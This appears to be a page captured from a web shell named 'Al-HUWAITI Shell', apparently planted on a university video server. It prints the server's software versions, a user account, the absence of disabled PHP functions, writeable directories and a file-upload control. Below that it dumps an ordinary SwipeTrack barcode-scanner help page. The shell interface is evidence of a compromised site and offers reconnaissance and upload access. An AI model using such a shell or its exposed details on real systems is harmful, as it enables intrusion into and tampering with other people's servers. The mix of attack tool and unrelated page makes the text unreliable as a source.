hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/video.obu.edu/st/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/video.obu.edu/st/scanner.html
<!DOCTYPE html> 
<html> 
	<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
		<title>SwipeTrack Browser</title> 
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0;"  />
		<meta name="apple-mobile-web-app-capable" content="yes" />
		<link rel="stylesheet" href="css/jquery.mobile-1.0.min.css" />
		<link rel="stylesheet" href="css/style.css" />
		<script type="text/javascript" src="js/jquery-1.6.4.min.js"></script>
		<script type="text/javascript" src="js/jquery.mobile-1.0.min.js"></script>
		<script type="text/javascript">
			//wait for document.ready to fire
			$(function () {
			
			    //then load the JavaScript file
			    $.getScript('js/functions.js');
			});
		</script>
	</head> 
	<body> 
		<div data-role="page" id ="about" class="page">
			<div data-role="header" data-theme="b">
				<a href="index.html" data-icon="arrow-l" data-direction="reverse">Back</a>
				<a href="index.html" data-icon="home" data-direction="reverse">Home</a>
				<h1>Scanning Barcodes</h1>
			</div><!--/header-->
			<div data-role="content" id="about-content">
				<div class="ui-body ui-body-d">
			        <div id="noscan"><center><h2>Scan a Barcode Now!</h2></center></div>
			        <div id="scan" style="display:none;"><center><div id="color-bar" style="height:25px; background:#09D607;"><h3>Success</h3></div>
<br><div id="barcode"></div><br></center></div>
				</div>
				<br>
				<div class="ui-body ui-body-d">
			        <h2>Using a Scanner</h2>
					<div class="icon">
						<h5>Using a Linea Pro or Infinea Tab</h5>
						<img src="img/32-iphone.png" alt="iphone" />
						<p><small>Linea Pro & Infinea Tab support comes enabled by default. If you have your device plugged in and you <i>do not</i> see a "Connecting..." bar at the bottom, you should be good to go. If you see a Connecting..." bar, try pressing the small battery indicator button on the bottom of your device. This should wake your device up.  If you are still having problems, please call our technical support line at (888) 855-5024.</small></p>
					</div>
					<hr/>
					<div class="icon">
						<h5>Using a Socket Mobile Scanner</h5>
						<img src="img/32-iphone.png" alt="iphone" />
						<p><small>Your Socket barcode scanner has two different modes. By default, your scanner will come in HID "Keyboard" mode. Using this mode requires you to tap the correct field before scanning the barcode and delete the content in the field (for example, the customer search or product search field). The on-screen keyboard can be accessed by double-clicking the power button. If you want the scanner to interact with your webpage using our Browser API (required to test on this page), you need to run the scanner in iOS mode. Using this mode will ensure any barcodes scanned automatically fire our Javscript callbacks. To change to iOS mode, please follow the directions in your user manual.</small></p>
					</div>
					<hr/>
					<div class="icon">
						<h5>Coming Soon: New Scanners</h5>
						<img src="img/40-inbox.png" alt="inbox" />
						<p><small>We are always on the lookout for the newest and greatest hardware. Sign up for our newsletter or keep an eye on our website for updates!</small></p>
					</div>

				</div>		
			</div><!-- /content -->
		</div><!-- /page -->
	</body>
</html>

Al-HUWAITI Shell